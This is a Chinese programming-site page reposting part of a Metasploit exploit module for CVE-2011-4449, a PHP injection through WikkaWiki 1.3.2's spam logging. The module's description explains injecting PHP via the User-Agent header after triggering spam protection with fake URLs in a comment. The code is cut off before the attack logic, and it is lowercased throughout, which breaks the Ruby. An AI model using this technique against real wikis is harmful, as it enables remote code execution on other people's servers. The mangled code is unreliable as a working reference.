当前位置: 萬仟网 > IT编程>开发语言>PHP > WikkaWiki 1.3.2 Spam Logging PHP注射的方法

WikkaWiki 1.3.2 Spam Logging PHP注射的方法

2018年03月24日  | 萬仟网IT编程  | 我要评论
WikkaWiki 1.3.2 Spam Logging PHP注射的详细方法代码... 12-05-14
##
# this file is part of the metasploit framework and may be subject to
# redistribution and commercial restrictions. please see the metasploit
# framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class metasploit3 < msf::exploit::remote
rank = excellentranking
include msf::exploit::remote::httpclient
def initialize(info={})
super(update_info(info,
'name' => "wikkawiki 1.3.2 spam logging php injection",
'description' => %q{
this module exploits a vulnerability found in wikkawiki. when the spam logging
feature is enabled, it is possible to inject php code into the spam log file via the
useragent header , and then request it to execute our payload. there are at least
three different ways to trigger spam protection, this module does so by generating
10 fake urls in a comment (by default, the max_new_comment_urls parameter is 6).
please note that in order to use the injection, you must manually pick a page
first that allows you to add a comment, and then set it as 'page'.
},
'license' => msf_license,
'author' =>
[
'egix', #initial discovery, poc
'sinn3r' #metasploit
],
'references' =>
[
['cve', '2011-4449'],
['osvdb', '77391'],
['edb', '18177'],
['url', 'http:// www.jb51.net /trac/wikka/ticket/1098']
],
'payload' =>
{
'badchars' => "\x00"
},
'defaultoptions' =>
{
'exitfunction' => "none"
},
'arch' => arch_php,
'platform' => ['php'],
'targets' =>
[
['wikkawiki 1.3.2 r1814', {}]
],
'privileged' => false,
'disclosuredate' => "nov 30 2011",
'defaulttarget' => 0))
register_options(
[
optstring.new('username', [true, 'wikkawiki username']),
optstring.new('password', [true,

如您对本文有疑问或者有任何想说的,请点击进行留言回复,万千网友为您解惑!

相关文章:

验证码:
Copyright © 2017-2021  萬仟网 保留所有权利. 粤ICP备17035492号-1
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com